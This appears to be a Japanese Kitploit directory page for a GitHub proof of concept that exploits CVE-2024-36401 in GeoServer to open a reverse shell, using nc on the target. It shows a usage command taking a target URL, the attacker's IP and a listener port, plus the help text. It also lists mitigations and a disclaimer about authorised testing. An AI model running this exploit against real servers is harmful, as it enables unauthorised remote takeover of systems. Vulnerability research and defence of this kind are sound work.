Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-36401 — CVE-2024-36401のPOC。このPOCは、vlun標的からリバースシェルを確立しようとします。 | Kitploit
ツール/GitHubGitHub/bigb0x/cve-2024-36401
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubbigb0x/cve-2024-36401

CVE-2024-36401

CVE-2024-36401のPOC。このPOCは、vlun標的からリバースシェルを確立しようとします。

リポジトリを見る
34152年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-36401 用の RCE

CVE-2024-36401 GeoServer 用の POC。この POC は、ターゲットからリバースシステムシェルを確立しようとします。

Banner

概要

CVE-2024-36401 の POC: GeoServer バージョン 2.25.1、2.24.3、2.23.5 より前の GeoServer 用の RCE。この POC は、phith0n によるセキュリティアドバイザリに基づいています。

動作の仕組み

  1. ターゲットからの着信リバースシェル用に、自分のマシンにリスナーをセットアップします。
  2. この POC は、ペイロードを含む POST リクエストを送信します。
  3. ターゲットサーバー上でシェルを確立しようとします。
  4. この手法は、ターゲットに nc がインストールされていることを前提としています。

使用方法

この POC は、vlun ターゲットからのリバースシェルを確立しようとします。これは、vlun Linux ターゲットに対して動作することを目的としています。この POC を実行するには、公開されアクセス可能な IP を持つマシンが必要です。

最低要件

  • Python 3.6 以上
  • requests ライブラリ

この POC を単一のターゲットに対して使用する場合:

root@kitploit:~
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

ヘルプ:

root@kitploit:~
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites

GeoServer アプライアンスを保護する方法

1- WFS リクエストを無効にします。

2- iptables を設定してリバース接続を無効にし、デフォルトポリシーをすべてのトラフィックをドロップに設定し、確立済みおよび関連する接続を許可し、DNS、HTTP、HTTPS などの必要なアウトバウンドトラフィックのみを許可することで、Linux をセキュリティ保護します。

3- または、GeoServer の最新バージョンにアップグレードします。

連絡先

ご提案やご意見がありましたら、私 までご連絡ください。

免責事項

私は楽しみ、仕事、教育目的でのみ独自のツールを作成します。ハッキングやシステムやネットワークへの不正アクセスを支持または推奨するものではありません。ツールは責任を持って、テストする明確な許可があるシステムでのみ使用してください。

ツールをダウンロード